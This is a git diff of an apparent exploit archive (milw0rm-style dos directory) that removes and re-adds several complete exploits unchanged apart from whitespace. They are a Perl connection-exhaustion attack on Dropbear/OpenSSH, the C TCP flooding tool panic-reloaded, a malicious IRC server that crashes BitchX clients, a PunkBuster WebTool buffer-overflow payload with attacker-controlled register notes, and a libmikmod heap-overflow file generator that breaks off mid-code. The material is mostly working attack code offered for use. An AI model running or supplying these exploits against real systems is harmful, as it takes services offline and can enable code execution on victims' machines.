= @ARGV; - -sub usage -{ - print "\nDropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service Exploit\n"; - print "by /str0ke (milw0rm.com)\n"; - print "Credits to Pablo Fernandez\n"; - print "Usage: $0 [Target Domain] [Target Port] [Seconds to hold attack]\n"; - exit (); -} - -sub exploit -{ - my ($serv, $port, $sleep) = @_; - my $sock = new IO::Socket::INET ( PeerAddr => $serv, - PeerPort => $port, - Proto => 'tcp', - ); - - die "Could not create socket: $!\n" unless $sock; - sleep $sleep; - close($sock); -} - -sub thread { - print "Server: $serv\nPort: $port\nSeconds: $time\n"; - for my $i ( 1 .. 51 ) { - print "."; - my $thr = new Thread \&exploit, $serv, $port, $time; - } - sleep $time; #detach wouldn't be good -} - -if (@ARGV != 3){&usage;}else{&thread;} - -# milw0rm.com [2006-03-10] +#!/usr/bin/perl +## I needed a working test script so here it is. +## just a keep alive thread, I had a few problems with Pablo's code running properly. +## +## Straight from Pablo Fernandez's advisory: +# Vulnerable code is in svr-main.c +# +# /* check for max number of connections not authorised */ +# for (j = 0; j < MAX_UNAUTH_CLIENTS; j++) { +# if (childpipes[j] < 0) { +# break; +# } +# } +# +# if (j == MAX_UNAUTH_CLIENTS) { +# /* no free connections */ +# /* TODO - possibly log, though this would be an easy way +# * to fill logs/disk */ +# close(childsock); +# continue; +# } +## /str0ke (milw0rm.com) + +use IO::Socket; +use Thread; +use strict; + +# thanks to Perl Underground for my moronic coding style fixes. +my ($serv, $port, $time) = @ARGV; + +sub usage +{ + print "\nDropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service Exploit\n"; + print "by /str0ke (milw0rm.com)\n"; + print "Credits to Pablo Fernandez\n"; + print "Usage: $0 [Target Domain] [Target Port] [Seconds to hold attack]\n"; + exit (); +} + +sub exploit +{ + my ($serv, $port, $sleep) = @_; + my $sock = new IO::Socket::INET ( PeerAddr => $serv, + PeerPort => $port, + Proto => 'tcp', + ); + + die "Could not create socket: $!\n" unless $sock; + sleep $sleep; + close($sock); +} + +sub thread { + print "Server: $serv\nPort: $port\nSeconds: $time\n"; + for my $i ( 1 .. 51 ) { + print "."; + my $thr = new Thread \&exploit, $serv, $port, $time; + } + sleep $time; #detach wouldn't be good +} + +if (@ARGV != 3){&usage;}else{&thread;} + +# milw0rm.com [2006-03-10] diff --git a/platforms/multiple/dos/1671.c b/platforms/multiple/dos/1671.c index fb01d465e..cfb3747a9 100755 --- a/platforms/multiple/dos/1671.c +++ b/platforms/multiple/dos/1671.c @@ -1,260 +1,260 @@ -/* ----------------------------------------------------------------------------- - * ______________________________ __________ - * __ ____/_ __ \__ __/__ __/_____ ____ ____ /_ /_ - * _ / __ _ / / /_ / __ /_ _ __ / / / /_ /_ __/ - * / /_/ / / /_/ /_ / _ __/ / /_/ // /_/ /_ / / /_ - * \____/ \____/ /_/ /_/ \__,_/ \__,_/ /_/ \__/ - * Security Community - * - * ----------------------------------------------------------------------------- - * - * Software for educational purposes - * - * panic-reloaded.c written by hash - * - * - * Description: TCP Denial Of Service Tool. panic-reloaded does - * not require large link or fast internet connection, - * it creates many pthreads, leaving openned connections - * to victim host. It is fast and an efficient way to - * deny a TCP service. - * - * Tested against SSH, FTP, HTTP. - * - * TTY1: - * hash@scarface:~$ gcc -lpthread panic-reloaded.c -o panic-reloaded -Wall - * hash@scarface:~$ ./panic-reloaded3 10.10.10.2 22 20 100 10 - * panic-reloaded.c - * written by hash - * [!] Target: localhost:443 - * [!] Threads: 20 for each round - * [*] Countdown: 40 | [!] Sleeping: 10s - * - * TTY2: - * hash@scarface:~$ ssh localhost - * ssh_exchange_identification: Connection closed by remote host - * hash@scarface:~$ - * - * - * Greets to folks from gotfault, rfdslabs, tripbit - * and to friends out there. -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define AUTHOR "written by hash " - -void usage(char*); -void sockz(void*); -void header(); -void close_func(void *); -char *resolver(char*); - -struct pthread_args { - - char *host_pthread; - char *port_pthread; - char *slp_pthread; - -};struct pthread_args thread_data_array[1]; - -struct pthread_close { - - char *slp_pthread; - int sock_pointer; - -};struct pthread_close thread_data[0]; - -void usage(char *progname) { - - header(); - printf("Use: %s host port threads rounds sleep_time\n",progname); - printf("host: ip address or hostname\n"); - printf("port: victim port\n"); - printf("threads: number of threads\n"); - printf("rounds: number of reloads, min 40\n"); - printf("sleep_time: sleep time between each round\n"); - exit(0); - -} - -void header() { - - printf("panic-reloaded.c\n"); - printf("%s\n",AUTHOR); - -} - -void close_func(void *c) { - - struct pthread_close *my_close; - - char *slp_tmp; - int slp, - err, - sock_p; - - my_close = (struct pthread_close *) c; - slp_tmp = my_close->slp_pthread; - sock_p = my_close->sock_pointer; - - slp = atoi(slp_tmp); - - sleep(slp+1); - - if((err = close(sock_p)) < 0) { - printf("close_func: Can`t close socket\n"); - exit(-1); - } - - -} - -void sockz(void *t) { - - struct sockaddr_in dest; - struct pthread_args *my_data; - pthread_t close_them_all; - - char *h, - *p_tmp, - *slp_tmp; - - int p, - con, - err, - desc, - slp; - - my_data = (struct pthread_args *) t; - - h = my_data->host_pthread; - p_tmp = my_data->port_pthread; - slp_tmp = my_data->slp_pthread; - - p = atoi(p_tmp); - slp = atoi(slp_tmp); - - desc = socket(AF_INET,SOCK_STREAM,0); - - if((desc = socket(AF_INET,SOCK_STREAM,0)) < 0) { - perror("sockz: Can`t create socket\n"); - exit(-1); - } - - dest.sin_family = AF_INET; - dest.sin_port = htons(p); - dest.sin_addr.s_addr = inet_addr(h); - bzero(&(dest.sin_zero),8); - - con = connect(desc,(struct sockaddr *)&dest,sizeof(dest)); - - if(con < 0) { - printf("\nsockz: Can`t connect to %s:%d\n",h,p); - close(desc); - exit(-1); - } - - thread_data[0].sock_pointer = desc; - thread_data[0].slp_pthread = slp_tmp; - - if((err = pthread_create(&close_them_all,NULL,(void*)&close_func,\ - (void*)&thread_data[0]) == -1)) { - printf("sockz: Can`t create thread\n"); - exit(-1); - } - -} - -char *resolver(char *hosttmp){ - - struct hostent *h; - - char *host; - - h = gethostbyname(hosttmp); - - if(!h) { - printf("resolver: Can`t resolve hostname %s\n",hosttmp); - exit(-1); - } - - host = inet_ntoa(*((struct in_addr *)h->h_addr_list[0])); - - return host; -} - - -int main(int ac, char **av) { - - if(ac<6) - usage(av[0]); - - int x, - y, - z, - err; - - char *hosttmp, - *port, - *host, - *slp; - - int sockets, - rounds, - slptime, - countdown; - - hosttmp = av[1]; - port = av[2]; - sockets = atoi(av[3]); - rounds = atoi(av[4]); countdown = rounds; - slp = av[5]; - slptime = atoi(slp); - - if(rounds<40) - usage(av[0]); - - host = resolver(hosttmp); - - pthread_t threads[rounds]; - - header(); - - printf("[!] Target: %s:%s\n",host,port); - printf("[!] Threads: %d for each round\n",sockets); - - for(z=0;z + * + * + * Description: TCP Denial Of Service Tool. panic-reloaded does + * not require large link or fast internet connection, + * it creates many pthreads, leaving openned connections + * to victim host. It is fast and an efficient way to + * deny a TCP service. + * + * Tested against SSH, FTP, HTTP. + * + * TTY1: + * hash@scarface:~$ gcc -lpthread panic-reloaded.c -o panic-reloaded -Wall + * hash@scarface:~$ ./panic-reloaded3 10.10.10.2 22 20 100 10 + * panic-reloaded.c + * written by hash + * [!] Target: localhost:443 + * [!] Threads: 20 for each round + * [*] Countdown: 40 | [!] Sleeping: 10s + * + * TTY2: + * hash@scarface:~$ ssh localhost + * ssh_exchange_identification: Connection closed by remote host + * hash@scarface:~$ + * + * + * Greets to folks from gotfault, rfdslabs, tripbit + * and to friends out there. +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define AUTHOR "written by hash " + +void usage(char*); +void sockz(void*); +void header(); +void close_func(void *); +char *resolver(char*); + +struct pthread_args { + + char *host_pthread; + char *port_pthread; + char *slp_pthread; + +};struct pthread_args thread_data_array[1]; + +struct pthread_close { + + char *slp_pthread; + int sock_pointer; + +};struct pthread_close thread_data[0]; + +void usage(char *progname) { + + header(); + printf("Use: %s host port threads rounds sleep_time\n",progname); + printf("host: ip address or hostname\n"); + printf("port: victim port\n"); + printf("threads: number of threads\n"); + printf("rounds: number of reloads, min 40\n"); + printf("sleep_time: sleep time between each round\n"); + exit(0); + +} + +void header() { + + printf("panic-reloaded.c\n"); + printf("%s\n",AUTHOR); + +} + +void close_func(void *c) { + + struct pthread_close *my_close; + + char *slp_tmp; + int slp, + err, + sock_p; + + my_close = (struct pthread_close *) c; + slp_tmp = my_close->slp_pthread; + sock_p = my_close->sock_pointer; + + slp = atoi(slp_tmp); + + sleep(slp+1); + + if((err = close(sock_p)) < 0) { + printf("close_func: Can`t close socket\n"); + exit(-1); + } + + +} + +void sockz(void *t) { + + struct sockaddr_in dest; + struct pthread_args *my_data; + pthread_t close_them_all; + + char *h, + *p_tmp, + *slp_tmp; + + int p, + con, + err, + desc, + slp; + + my_data = (struct pthread_args *) t; + + h = my_data->host_pthread; + p_tmp = my_data->port_pthread; + slp_tmp = my_data->slp_pthread; + + p = atoi(p_tmp); + slp = atoi(slp_tmp); + + desc = socket(AF_INET,SOCK_STREAM,0); + + if((desc = socket(AF_INET,SOCK_STREAM,0)) < 0) { + perror("sockz: Can`t create socket\n"); + exit(-1); + } + + dest.sin_family = AF_INET; + dest.sin_port = htons(p); + dest.sin_addr.s_addr = inet_addr(h); + bzero(&(dest.sin_zero),8); + + con = connect(desc,(struct sockaddr *)&dest,sizeof(dest)); + + if(con < 0) { + printf("\nsockz: Can`t connect to %s:%d\n",h,p); + close(desc); + exit(-1); + } + + thread_data[0].sock_pointer = desc; + thread_data[0].slp_pthread = slp_tmp; + + if((err = pthread_create(&close_them_all,NULL,(void*)&close_func,\ + (void*)&thread_data[0]) == -1)) { + printf("sockz: Can`t create thread\n"); + exit(-1); + } + +} + +char *resolver(char *hosttmp){ + + struct hostent *h; + + char *host; + + h = gethostbyname(hosttmp); + + if(!h) { + printf("resolver: Can`t resolve hostname %s\n",hosttmp); + exit(-1); + } + + host = inet_ntoa(*((struct in_addr *)h->h_addr_list[0])); + + return host; +} + + +int main(int ac, char **av) { + + if(ac<6) + usage(av[0]); + + int x, + y, + z, + err; + + char *hosttmp, + *port, + *host, + *slp; + + int sockets, + rounds, + slptime, + countdown; + + hosttmp = av[1]; + port = av[2]; + sockets = atoi(av[3]); + rounds = atoi(av[4]); countdown = rounds; + slp = av[5]; + slptime = atoi(slp); + + if(rounds<40) + usage(av[0]); + + host = resolver(hosttmp); + + pthread_t threads[rounds]; + + header(); + + printf("[!] Target: %s:%s\n",host,port); + printf("[!] Threads: %d for each round\n",sockets); + + for(z=0;zMOV BYTE PTR SS:[ESP+1055],0 -0511B3BE FF96 54010000 CALL DWORD PTR DS:[ESI+154] -0511B3C4 8BBC24 64100000 MOV EDI,DWORD PTR SS:[ESP+1064] -... - -The ESI register is controlled by the attacker. -The memcpy function described above instead is located at offset -0512aea7. - -############################################################################## - -Send the following text file to the port on which is running PunkBuster - -POST /pbsvweb HTTP/1.1 - -webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff -cmds=Command Screen - -or simply build and use a link like the following: - - http://127.0.0.1:80/pbsvweb/plist=1&webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff - -# milw0rm.com [2006-05-23] + Luigi Auriemma + +############################################################################## + +Application: PunkBuster + http://www.punkbuster.com +Versions: PunkBuster for servers, versions minor than v1.229: + America's Army <= v1.228 + Battlefield 1942 <= v1.158 + Battlefield 2 <= v1.184 + Battlefield Vietnam <= v1.150 + Call of Duty <= v1.173 + Call of Duty 2 <= v1.108 + DOOM 3 <= v1.159 + Enemy Territory <= v1.167 + Far Cry <= v1.150 + F.E.A.R. <= v1.093 + Joint Operations <= v1.187 + Quake III Arena <= v1.150 + Quake 4 <= v1.181 + Rainbow Six 3: Raven Shield <= v1.169 + Rainbow Six 4: Lockdown <= v1.093 + Return to Castle Wolfenstein <= v1.175 + Soldier of Fortune II <= v1.183 +Platforms: Win32, Linux and Mac +Bug: buffer overflow in the built-in web server for the remote + server's administration (WebTool) +Exploitation: remote, versus server +Date: 23 May 2006 +Author: Luigi Auriemma + e-mail: aluigi@autistici.org + web: aluigi.org + +############################################################################## + +This web server is not enabled by default but must be activated +selecting the TCP port on which running the service using the command: +pb_sv_httpport PORT + +The authentication mechanism is handled through a parameter called +webkey followed by the password and sent by the client using the POST +method or directly in the URL. + +A webkey longer than 1024 bytes exploits a buffer-overflow which +happens when the program uses the memcpy function for copying the +attacker string in a limited buffer used for the comparison with the +valid service's password. + +The following is the code from the pbsv.dll 1.183 of the game Soldier +of Fortune II where happens the exception which interrupts the game: + +... +0511B3A8 8BB424 58100000 MOV ESI,DWORD PTR SS:[ESP+1058] +0511B3AF 8D4424 18 LEA EAX,DWORD PTR SS:[ESP+18] +0511B3B3 6A 41 PUSH 41 +0511B3B5 50 PUSH EAX +0511B3B6 C68424 55100000 >MOV BYTE PTR SS:[ESP+1055],0 +0511B3BE FF96 54010000 CALL DWORD PTR DS:[ESI+154] +0511B3C4 8BBC24 64100000 MOV EDI,DWORD PTR SS:[ESP+1064] +... + +The ESI register is controlled by the attacker. +The memcpy function described above instead is located at offset +0512aea7. + +############################################################################## + +Send the following text file to the port on which is running PunkBuster + +POST /pbsvweb HTTP/1.1 + +webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff +cmds=Command Screen + +or simply build and use a link like the following: + + http://127.0.0.1:80/pbsvweb/plist=1&webkey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccddddeeeeffff + +# milw0rm.com [2006-05-23] diff --git a/platforms/multiple/dos/1937.html b/platforms/multiple/dos/1937.html index 8c4dc9124..08d10c8d5 100755 --- a/platforms/multiple/dos/1937.html +++ b/platforms/multiple/dos/1937.html @@ -25,5 +25,5 @@ Proof Of Concept DoS exploit: boom - -# milw0rm.com [2006-06-21] + +# milw0rm.com [2006-06-21] diff --git a/platforms/multiple/dos/1947.c b/platforms/multiple/dos/1947.c index 89788a05a..a9f808356 100755 --- a/platforms/multiple/dos/1947.c +++ b/platforms/multiple/dos/1947.c @@ -1,90 +1,90 @@ -// BitchX (epic) =<1.1-final | do_hook() Boundary Check Error Remote DoS -///////////////////////////////////////////////////////////////////////// -// Federico L. Bossi Bonin -// fbossinetcommcomar - - -// #0 0x080a3fcc in BX_do_hook (which=9999999, format=0x8119077 "%s %s") at hook.c:865 -// #1 0x080d013b in numbered_command (from=0xbfbfe031 'A' , -// comm=-9999999, ArgList=0xbfbfd788) at numbers.c:1413 -// #2 0x080d7d02 in parse_server (orig_line=0xbfbfe030 ":", 'A' ...) at parse.c:1912 -// #3 0x080de3c2 in do_server (rd=0xbfbfe8a0, wr=0xbfbfe880) at server.c:584 -// #4 0x080b030f in BX_io (what=0x810b85a "main") at irc.c:1319 -// #5 0x080b09da in main (argc=6, argv=0xbfbfe9d4, envp=0xbfbfe9f0) at irc.c:1687 -// #6 0x0804aec2 in ___start () - -//greats to nitr0us, beck, gruba, samelat, ran, etc.. - -#include -#include -#include -#include - -#define PORT 6667 -#define LEN 100 - -int intalign=-999; //use negative number - -void sendbuff(int sock) { -char ptr[LEN]; -char buffer[2048]; -bzero(ptr,LEN); -bzero(buffer,2048); -memset(ptr,0x41,sizeof(ptr)-1); -sprintf(buffer,":%s %i %s %s\n",ptr,intalign,ptr,ptr); -write(sock,buffer,sizeof(buffer)); -} - -int main() { -struct sockaddr_in srv_addr, client; -int len,pid,sockfd,sock; - -sockfd = socket(AF_INET, SOCK_STREAM, 0); - -if (sockfd < 0) { -perror("error socket()"); -exit(1); -} - -bzero((char *) &srv_addr, sizeof(srv_addr)); -srv_addr.sin_family = AF_INET; -srv_addr.sin_addr.s_addr = INADDR_ANY; -srv_addr.sin_port = htons(PORT); - -if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { -perror("error bind()"); -exit(1); -} - - -printf("BitchX (epic) =<1.1-final | do_hook() Boundary Check Error Remote DoS\n"); -printf("====================================================================\n"); -printf("Listening on port %i\n",PORT); - -listen(sockfd,5); -len = sizeof(client); - -while (1) { -sock = accept(sockfd, (struct sockaddr *) &client, &len); -if (sock < 0) { -perror("error accept()"); -exit(1); -} - -pid = fork(); -if (pid < 0) { -perror("fork()"); -exit(1); -} -if (pid == 0) { -close(sockfd); -printf("Conection from %s\n",inet_ntoa(client.sin_addr)); -sendbuff(sock); -exit(0); -} -else close(sock); -} -return 0; -} - -// milw0rm.com [2006-06-24] +// BitchX (epic) =<1.1-final | do_hook() Boundary Check Error Remote DoS +///////////////////////////////////////////////////////////////////////// +// Federico L. Bossi Bonin +// fbossinetcommcomar + + +// #0 0x080a3fcc in BX_do_hook (which=9999999, format=0x8119077 "%s %s") at hook.c:865 +// #1 0x080d013b in numbered_command (from=0xbfbfe031 'A' , +// comm=-9999999, ArgList=0xbfbfd788) at numbers.c:1413 +// #2 0x080d7d02 in parse_server (orig_line=0xbfbfe030 ":", 'A' ...) at parse.c:1912 +// #3 0x080de3c2 in do_server (rd=0xbfbfe8a0, wr=0xbfbfe880) at server.c:584 +// #4 0x080b030f in BX_io (what=0x810b85a "main") at irc.c:1319 +// #5 0x080b09da in main (argc=6, argv=0xbfbfe9d4, envp=0xbfbfe9f0) at irc.c:1687 +// #6 0x0804aec2 in ___start () + +//greats to nitr0us, beck, gruba, samelat, ran, etc.. + +#include +#include +#include +#include + +#define PORT 6667 +#define LEN 100 + +int intalign=-999; //use negative number + +void sendbuff(int sock) { +char ptr[LEN]; +char buffer[2048]; +bzero(ptr,LEN); +bzero(buffer,2048); +memset(ptr,0x41,sizeof(ptr)-1); +sprintf(buffer,":%s %i %s %s\n",ptr,intalign,ptr,ptr); +write(sock,buffer,sizeof(buffer)); +} + +int main() { +struct sockaddr_in srv_addr, client; +int len,pid,sockfd,sock; + +sockfd = socket(AF_INET, SOCK_STREAM, 0); + +if (sockfd < 0) { +perror("error socket()"); +exit(1); +} + +bzero((char *) &srv_addr, sizeof(srv_addr)); +srv_addr.sin_family = AF_INET; +srv_addr.sin_addr.s_addr = INADDR_ANY; +srv_addr.sin_port = htons(PORT); + +if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { +perror("error bind()"); +exit(1); +} + + +printf("BitchX (epic) =<1.1-final | do_hook() Boundary Check Error Remote DoS\n"); +printf("====================================================================\n"); +printf("Listening on port %i\n",PORT); + +listen(sockfd,5); +len = sizeof(client); + +while (1) { +sock = accept(sockfd, (struct sockaddr *) &client, &len); +if (sock < 0) { +perror("error accept()"); +exit(1); +} + +pid = fork(); +if (pid < 0) { +perror("fork()"); +exit(1); +} +if (pid == 0) { +close(sockfd); +printf("Conection from %s\n",inet_ntoa(client.sin_addr)); +sendbuff(sock); +exit(0); +} +else close(sock); +} +return 0; +} + +// milw0rm.com [2006-06-24] diff --git a/platforms/multiple/dos/1972.txt b/platforms/multiple/dos/1972.txt index 21cc472c1..8a7d0304b 100755 --- a/platforms/multiple/dos/1972.txt +++ b/platforms/multiple/dos/1972.txt @@ -1,28 +1,28 @@ - - - - - - - - - -# milw0rm.com [2006-07-01] + + + + + + + + + +# milw0rm.com [2006-07-01] diff --git a/platforms/multiple/dos/2073.c b/platforms/multiple/dos/2073.c index 2121f4d70..3924dd9c1 100755 --- a/platforms/multiple/dos/2073.c +++ b/platforms/multiple/dos/2073.c @@ -1,151 +1,151 @@ -/* - -by Luigi Auriemma - -*/ - -#include -#include -#include -#include - - - -#define VER "0.1" - - - -#define cpy(x,y) strncpy(x, y, sizeof(x)); -void fwi08(FILE *fd, int num); -void fwi16(FILE *fd, int num); -void fwi32(FILE *fd, int num); -void fwstr(FILE *fd, uint8_t *str); -void fwmem(FILE *fd, uint8_t *data, int size); -void std_err(void); - - - -#pragma pack(1) - -typedef struct { - uint8_t gt2[3]; - uint8_t version; - uint32_t chunk_size; - uint8_t module[32]; - uint8_t comments[160]; - uint8_t date_day; - uint8_t date_month; - uint16_t date_year; - uint8_t tracker[24]; - uint16_t speed; - uint16_t tempo; - uint16_t volume; - uint16_t voices; - /* voices * 2 */ -} gt2_t; - -#pragma pack() - - - -int main(int argc, char *argv[]) { - FILE *fd; - gt2_t gt2; - int i; - char *fname; - - setbuf(stdout, NULL); - - fputs("\n" - "libmikmod <= 3.2.2 and current CVS heap overflow with GT2 files "VER"\n" - "by Luigi Auriemma\n" - "e-mail: aluigi@autistici.org\n" - "web: aluigi.org\n" - "\n", stdout); - - if(argc < 2) { - printf("\n" - "Usage: %s \n" - "\n", argv[0]); - exit(1); - } - - fname = argv[1]; - - printf("- create file %s\n", fname); - fd = fopen(fname, "wb"); - if(!fd) std_err(); - - gt2.gt2[0] = 'G'; - gt2.gt2[1] = 'T'; - gt2.gt2[2] = '2'; - gt2.version = 4; - gt2.chunk_size = 0; // unused - cpy(gt2.module, "module_name"); - cpy(gt2.comments, "author"); - gt2.date_day = 1; - gt2.date_month = 1; - gt2.date_year = 2006; - cpy(gt2.tracker, "tracker"); - gt2.speed = 6; - gt2.tempo = 300; - gt2.volume = 0; - gt2.voices = 0; - - printf("- write GT2 header\n"); - fwrite(>2, sizeof(gt2), 1, fd); - for(i = 0; i < gt2.voices; i++) fwi16(fd, 0); - - printf("- build the XCOM header for exploiting the heap overflow\n"); - fwmem(fd, "XCOM", 4); - fwi32(fd, 0); // unused - fwi32(fd, 0xffffffff); // bug here, 0xffffffff + 1 = 0 - fwstr(fd, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"); - - fclose(fd); - printf("- finished\n"); - return(0); -} - - - -void fwi08(FILE *fd, int num) { - fputc((num ) & 0xff, fd); -} - - - -void fwi16(FILE *fd, int num) { - fputc((num ) & 